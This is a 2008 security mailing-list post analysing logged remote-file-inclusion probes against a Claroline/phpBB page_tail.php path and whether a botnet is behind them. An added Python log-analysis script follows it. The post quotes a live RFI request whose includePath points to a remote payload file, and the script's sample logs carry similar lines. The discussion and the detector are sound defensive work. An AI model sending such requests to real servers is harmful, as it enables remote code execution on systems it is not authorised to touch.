[VIM] RFI BotNet and phpBB 0-day?

security curmudgeon jericho at attrition.org
Thu Mar 20 19:34:26 UTC 2008

: Dunno if it's a botnet but given Gadi's paper from last year on web 
: server compromises, it's a really good theory.

I say that based on a few things I've seen, and I bet a real analysis 
would very quickly prove or disprove the theory.

: > > /claroline/phpbb/page_tail.php?includePath=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt%3f%3f
: I looked at the 2.0.23 source.
: Using phpBB2 code: page_tail.php is in includes/ - so I wouldn't expect a
: /claroline/phpbb/page_tail.php to work.  So, this is probably Claroline.

Well, don't base it just on that path. I see a LOT of obvious path request 


I see these a hundred times a day and they obviously will not work. So seeing 
/claroline/ in front of the /phpbb/ request was odd, but I didn't take it 
to mean it was necessarily Claroline, even though it may be.

:   ./claroline155/claroline/phpbb/page_tail.php
: But - no apparent luck:
:   @include(dirname(__FILE__)."/../inc/claro_init_footer.inc.php");
: and no mention of includePath in that file.
: claro_init_footer.inc.php seems clean.
: Similar for 1.64.
: However - $includePath is used all over the place in Claroline, and
: apparently uses an unset(), so maybe there's a relationship with an unset
: bug.
: 1.42 ZIP file seems corrupted, so I couldn't check it out.

From George:

Looks like an issue in Claroline 1.5.x fixed with the release of 1.5.5 
back in 2006:


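Added example, not part of the original message: one way to run the kind of log analysis the thread calls for. It groups requests whose parameter value is a remote URL (as with `includePath=http://...%3f%3f` above) by payload and counts distinct source addresses. The log lines, hosts and function names are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl

# Constructed sample lines (Apache combined-log style, documentation addresses).
SAMPLE_LOG = """\
192.0.2.10 - - [20/Mar/2008:10:00:01 +0000] "GET /claroline/phpbb/page_tail.php?includePath=http://payload.example/id2.txt%3f%3f HTTP/1.1" 404 210
198.51.100.7 - - [20/Mar/2008:10:02:13 +0000] "GET /forum/page_tail.php?includePath=http://payload.example/id2.txt%3f HTTP/1.1" 404 210
203.0.113.5 - - [20/Mar/2008:10:05:40 +0000] "GET /index.php?page=http://other.example/r.txt? HTTP/1.1" 200 5120
192.0.2.10 - - [20/Mar/2008:10:06:02 +0000] "GET /viewtopic.php?t=42&ref=about HTTP/1.1" 200 9000
"""

# Source address and request target from one access-log line.
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+)')
# A parameter value that names a remote resource.
REMOTE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)


def remote_include_attempts(log_text):
    """Map each remote payload URL to the sources and (path, parameter) pairs seen."""
    hits = defaultdict(lambda: {"sources": set(), "targets": set()})
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        source, target = m.groups()
        path, _, query = target.partition("?")
        # parse_qsl percent-decodes values, so %3f becomes "?".
        for name, value in parse_qsl(query, keep_blank_values=True):
            if REMOTE.match(value):
                # Trailing "?" only neutralises an appended suffix; drop it
                # so variants of the same payload group together.
                payload = value.rstrip("?")
                hits[payload]["sources"].add(source)
                hits[payload]["targets"].add((path, name))
    return hits


def shared_payloads(hits, min_sources=2):
    """Payload URLs requested by several distinct sources (coordinated scanning)."""
    return sorted(p for p, h in hits.items() if len(h["sources"]) >= min_sources)


if __name__ == "__main__":
    found = remote_include_attempts(SAMPLE_LOG)
    for payload in shared_payloads(found):
        print(payload, sorted(found[payload]["sources"]), sorted(found[payload]["targets"]))
```

One payload URL arriving from many unrelated sources, against paths that mostly do not exist on the server, is the pattern that would support the botnet theory.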